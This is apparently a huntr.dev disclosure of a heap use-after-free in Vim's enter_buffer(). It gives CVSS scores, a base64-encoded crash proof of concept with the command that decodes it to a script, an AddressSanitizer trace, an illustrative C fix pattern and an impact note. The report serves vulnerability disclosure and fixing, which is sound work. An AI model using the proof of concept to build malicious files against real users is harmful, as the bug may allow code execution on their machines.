huntr | Alkyne | B987C8CB-BBBE-4601-8A6C-54FF907C6B51
History: Jan 31, 2022 - 11:25 a.m.

None in vim/vim

2022-01-31 11:25:01
alkyne
www.huntr.dev
9

CVSS3: 7.8 High
  Attack Vector: LOCAL
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: REQUIRED
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS2: 6.8 Medium
  Access Vector: NETWORK
  Access Complexity: MEDIUM
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: PARTIAL
  Availability Impact: PARTIAL
  Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

EPSS: 0.001 Low
  Percentile: 40.4%

Description

Heap use-after-free in the enter_buffer() function (src/buffer.c). As the ASan trace below shows, the buf_T is allocated while a quickfix/location-list window is opened (ex_copen -> qf_open_new_cwindow -> do_ecmd), freed by free_buffer(), and then read again when a buffer-unload command (ex_bunload -> do_bufdel -> do_buffer_ext -> set_curbuf -> enter_buffer) makes the freed buffer current. Decoded, the PoC is a short Vim script: a function R() that runs :tab lop (lopen), a :let, :e with a control character as the file name and :lf (lfile); R() is evaluated three times and the script ends with bw! (:bwipeout!).

commit: 5703310e640c4b142a16a3ea4f45317565ae8c32

Proof of Concept

$ echo -ne "ZnUgUigpCiAgdGFiIGxvcAogIGxldCBsOj1nCiAgZQEKbGYKZW5kZgoKY2FsIGFzYWwoIiIsUigpKQpjYWwgYXNhbCgiIixSKCkpCmNhbCBhc2FsKCIiLFIoKSkKYnchCg==" | base64 -d > poc

# ASAN
$ ./src/vim -e -s -S poc -c ":qa!"
==3961346==ERROR: AddressSanitizer: heap-use-after-free on address 0x62500000c978 at pc 0x0000004e8700 bp 0x7fff02e62840 sp 0x7fff02e62838
READ of size 4 at 0x62500000c978 thread T0
    #0 0x4e86ff in enter_buffer /home/alkyne/fuzzing/vim-asan/src/buffer.c:1791:5
    #1 0x4f2afc in set_curbuf /home/alkyne/fuzzing/vim-asan/src/buffer.c:1772:2
    #2 0x4eeca9 in do_buffer_ext /home/alkyne/fuzzing/vim-asan/src/buffer.c:1551:5
    #3 0x4f0864 in do_buffer /home/alkyne/fuzzing/vim-asan/src/buffer.c:1572:12
    #4 0x4f0864 in do_bufdel /home/alkyne/fuzzing/vim-asan/src/buffer.c:1606:8
    #5 0x6a3fce in ex_bunload /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:5338:19
    #6 0x67f3d5 in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
    #7 0x67f3d5 in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
    #8 0xa71e9d in do_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1512:5
    #9 0xa7052d in cmd_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1098:14
    #10 0xa7052d in ex_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1124:2
    #11 0x67f3d5 in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
    #12 0x67f3d5 in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
    #13 0xd98977 in exe_commands /home/alkyne/fuzzing/vim-asan/src/main.c:3088:2
    #14 0xd98977 in vim_main2 /home/alkyne/fuzzing/vim-asan/src/main.c:774:2
    #15 0xd95f99 in main /home/alkyne/fuzzing/vim-asan/src/main.c:426:12
    #16 0x7fda0d3750b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #17 0x41eacd in _start (/home/alkyne/fuzzing/vim-asan/src/vim+0x41eacd)

0x62500000c978 is located 120 bytes inside of 9296-byte region [0x62500000c900,0x62500000ed50)
freed by thread T0 here:
    #0 0x496f8d in free (/home/alkyne/fuzzing/vim-asan/src/vim+0x496f8d)
    #1 0x4ea489 in free_buffer /home/alkyne/fuzzing/vim-asan/src/buffer.c:945:2

previously allocated by thread T0 here:
    #0 0x49720d in malloc (/home/alkyne/fuzzing/vim-asan/src/vim+0x49720d)
    #1 0x4c6d47 in lalloc /home/alkyne/fuzzing/vim-asan/src/alloc.c:248:11
    #2 0x663ffd in do_ecmd /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:2686:12
    #3 0x94f6a6 in qf_open_new_cwindow /home/alkyne/fuzzing/vim-asan/src/quickfix.c:4202:6
    #4 0x94f6a6 in ex_copen /home/alkyne/fuzzing/vim-asan/src/quickfix.c:4260:6

SUMMARY: AddressSanitizer: heap-use-after-free /home/alkyne/fuzzing/vim-asan/src/buffer.c:1791:5 in enter_buffer
Shadow bytes around the buggy address:
  0x0c4a7fff98d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff98e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff98f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff9900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff9910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c4a7fff9920: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd[fd]
  0x0c4a7fff9930: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fff9940: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fff9950: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fff9960: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fff9970: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==3961346==ABORTING
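The pattern the trace shows is a raw buf_T pointer that is taken before an operation which can free buffers and dereferenced afterwards. The following is an added illustration written for this page, not Vim's code: the names buf_T, buf_valid(), bufref_T, set_bufref() and bufref_valid() are borrowed from Vim's code base, which uses this pointer-plus-buffer-number-plus-free-counter check to detect stale references, but the bodies below are simplified stand-ins and the two scenario functions and their list layout are constructed for the example.

```c
#include <stdlib.h>

/* Simplified stand-in for Vim's buffer list (illustration, not Vim source). */
typedef struct buf_S buf_T;
struct buf_S {
    int     b_fnum;     /* buffer number: never reused within a process */
    buf_T  *b_next;
    buf_T  *b_prev;
};

static buf_T        *firstbuf = NULL;
static int           next_fnum = 1;
static unsigned long buf_free_count = 0;  /* bumped on every free_buffer() */

/* A checked reference: the pointer alone cannot say whether the buffer
 * behind it is still alive, so also remember its number and the value of
 * buf_free_count at the moment the reference was taken. */
typedef struct {
    buf_T        *br_buf;
    int           br_fnum;
    unsigned long br_buf_free_count;
} bufref_T;

buf_T *buflist_new(void)
{
    buf_T *buf = calloc(1, sizeof(*buf));
    if (buf == NULL)
        return NULL;
    buf->b_fnum = next_fnum++;
    buf->b_next = firstbuf;
    if (firstbuf != NULL)
        firstbuf->b_prev = buf;
    firstbuf = buf;
    return buf;
}

/* Unlink and free; any raw buf_T * a caller still holds now dangles. */
void free_buffer(buf_T *buf)
{
    if (buf->b_prev != NULL)
        buf->b_prev->b_next = buf->b_next;
    else
        firstbuf = buf->b_next;
    if (buf->b_next != NULL)
        buf->b_next->b_prev = buf->b_prev;
    ++buf_free_count;
    free(buf);
}

/* Walks the list comparing pointers only; never dereferences the candidate. */
int buf_valid(const buf_T *buf)
{
    for (buf_T *bp = firstbuf; bp != NULL; bp = bp->b_next)
        if (bp == buf)
            return 1;
    return 0;
}

void set_bufref(bufref_T *br, buf_T *buf)
{
    br->br_buf = buf;
    br->br_fnum = buf->b_fnum;
    br->br_buf_free_count = buf_free_count;
}

/* Fast path: nothing was freed since the reference was taken.
 * Slow path: the pointer must still be in the list AND carry the same
 * number, which also catches a freed chunk recycled for a new buffer at
 * the same address. */
int bufref_valid(const bufref_T *br)
{
    if (br->br_buf_free_count == buf_free_count)
        return 1;
    return buf_valid(br->br_buf) && br->br_buf->b_fnum == br->br_fnum;
}

/* The shape of the bug in the trace: a stale buf_T * is read after
 * free_buffer() ran on it somewhere in between. */
int enter_buffer_unsafe(buf_T *buf)
{
    return buf->b_fnum;          /* heap-use-after-free if buf was freed */
}

int enter_buffer_checked(const bufref_T *br)
{
    if (!bufref_valid(br))
        return -1;               /* refuse to enter a dead buffer */
    return br->br_buf->b_fnum;
}

/* Constructed scenario: reference a buffer, have it freed behind our back,
 * allocate another one (which may reuse the address), then try to enter. */
int scenario_freed_before_enter(void)
{
    buf_T *a = buflist_new();
    buf_T *b = buflist_new();
    bufref_T ref;
    set_bufref(&ref, b);
    free_buffer(b);              /* what free_buffer() did in the report */
    buf_T *c = buflist_new();    /* may land at b's old address */
    int rc = enter_buffer_checked(&ref);
    free_buffer(c);
    free_buffer(a);
    return rc;                   /* -1: the stale reference is rejected */
}

/* Constructed scenario: no free in between, so the reference stays valid. */
int scenario_still_alive(void)
{
    buf_T *a = buflist_new();
    bufref_T ref;
    set_bufref(&ref, a);
    int rc = enter_buffer_checked(&ref);
    int expect = a->b_fnum;
    free_buffer(a);
    return rc == expect ? 1 : 0;
}
```

The unsafe variant is shown only to name the pattern; it is never called in the scenarios, because calling it on a freed buffer is exactly the read ASan reports above.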

Impact

A use-after-free on a buf_T is a memory-safety bug: depending on the heap layout it results in a crash or, if the attacker controls what is reallocated into the freed region, in arbitrary code execution in the context of the user running Vim. The trigger is a crafted script or file that the victim opens or sources, consistent with AV:L/UI:R in the CVSS 3.1 vector.
